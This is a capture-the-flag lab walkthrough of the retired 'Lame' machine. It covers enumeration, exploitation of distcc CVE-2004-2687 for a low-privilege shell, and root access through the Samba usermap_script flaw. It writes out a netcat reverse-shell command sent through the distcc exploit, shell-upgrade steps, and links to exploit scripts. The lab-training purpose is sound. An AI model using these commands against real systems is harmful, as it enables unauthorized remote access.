# LAME | 10.10.10.3

## Initial Enumeration - nmap

> nmap -T4 -v -sC -sV 10.10.10.3 -oN nmap/initial

### Open Ports and Their Services

* 21 - FTP - vsftpd 2.3.4 - anon login allowed
* 22 - SSH - OpenSSH 4.7p1
* 139/445 - SMB - smbd 3.0.20-Debian - message signing disabled (but doesn't matter on a linux box?)
* 3632 - distccd (found after doing a full scan)

### OS Discovery

nmap was inconclusive. Obviously though we are dealing with a rather aged linux system, Debian or Ubuntu based.

## Service Enumeration

### FTP

Since the ftp server is configured to allow anonymous connections, I don't need to supply credentials in order to connect. However, as far as I can tell there is nothing in the directory. I do note that the pwd is '/'

![ftp](img/ftp.png)

This is an old (and infamous) version of vsftpd - one that contains a backdoor and could provide an easy win.  
There is a metasploit module for this exploit, but once I have finished enumerating fully I will look for a non-MS alternative, such as [this](https://github.com/ahervias77/vsftpd-2.3.4-exploit).

### SSH

Versions of OpenSSH below 7.7 are vulnerable to username enumeration according to a quick searchsploit query, but there is probably more low-hanging fruit (see above), so I will continue enumerating.

### SMB

This version of SMB appears to be vulnerable to a remote heap overflow attack, as well as a command exec exploit that is metasploit-based.  
The MS module works by using a username containing shell meta characters, which allows an unauthenticated user to run arbitrary commands.  
Since I am trying to avoid using metasploit as much as possible, I will move on.

Connecting via smbclient (after having to edit my smb.conf file to allow for connecting via SMBv1) allowed an anon login:

![smb-enum](img/smb-enum-1.png)

After some testing, it appears that the tmp folder is writable, so that's good:

![writable](img/smb-writable.png)

### DISTCC (Daemon)

This service appears to be vulnerable to a CVE that allows the execution of arbitrary commands, **CVE 2004-2687**. I confirmed it by using the nmap script:
> nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

![distccd](img/distccd-nmap.png)

This script does not seem to allow me to run commands besides 'id', so I searched for a different version of this exploit and found one based on python [here](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855).

## Initial Exploitation

So I have several attack vectors, some easier than others; but I know I want to try to avoid metasploit (I'll play with those later).

My first attempt will be via the vulnerable ftp server. I grabbed a python-based exploit from [here](https://github.com/ahervias77/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py) but it seemed to hang on the connect attempt to the backdoor:

![ftp](img/ftp-backdoor.png)

So this route is out. Luckily I have another option - the distcc exploit!

After setting up a listener and running the exploit, I am able to gain a limited shell as the 'daemon' user.

> ./distcc.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.12 6969 -e /bin/bash"

![shell](img/distcc-connect.png)

I ran a couple of basic commands to get a pty and tab completion, for a more stable shell:

> python -c 'import pty;pty.spawn("/bin/bash")'
> CTRL-Z
> stty raw -echo
> fg
> export TERM=xterm

Now I have a prompt and more facny shell features.

### User Enumeration

I have a shell as the daemon user, but this user is able to access a real user's home dir, so I quickly pop over there to grab the flag.

![user-flag](img/userflag.png)

After running some enum tools and finding a huge number of potential kernel exploits, I tried several of them one by one. None of them would work for me, so I started looking for a route to root through samba.

## Privilege Escalation

### Username map script execution

This exploit allows an unauthenticated attacker to put shellcode in as a username, basically. SMB is running as the root user, so this exploit gives you root access.  
The Metasploit module is pretty automated, so I wanted to find a different way.  
It took me some time to find a working python exploit since many were written in python 2 and I was operating in python 3, but eventually I found one [here](https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py).  
I set up a netcat listener and ran the exploit, which worked beautfully:

![exploit](img/usermap.png)  
![shell](img/root-shell.png)

As a last step, I grabbed the root flag and I was done:

![flag](img/root-flag.png)

## Conclusion 

I admit I made this harder for myself than I had to - but if I want to get OSCP certification I should try to avoid using Metasploit.  
My route took longer because I wanted to go through the entire process of enumeration, to make sure I didn't miss anything.  
I gained inital access by exploiting a known vulnerability in the distcc daemon that allowed me to gain a reverse shell.  
This low priv user could at least read the user flag, but I was not successful in compiling any C-based local kernel-level exploits I found.  
I ended up searching for a while and I found a non-Metasploit version of a samba exploit. If I were more determined at the outset I probably would have found that python code sooner, thereby eliminating any need for gaining a low-priv shell.

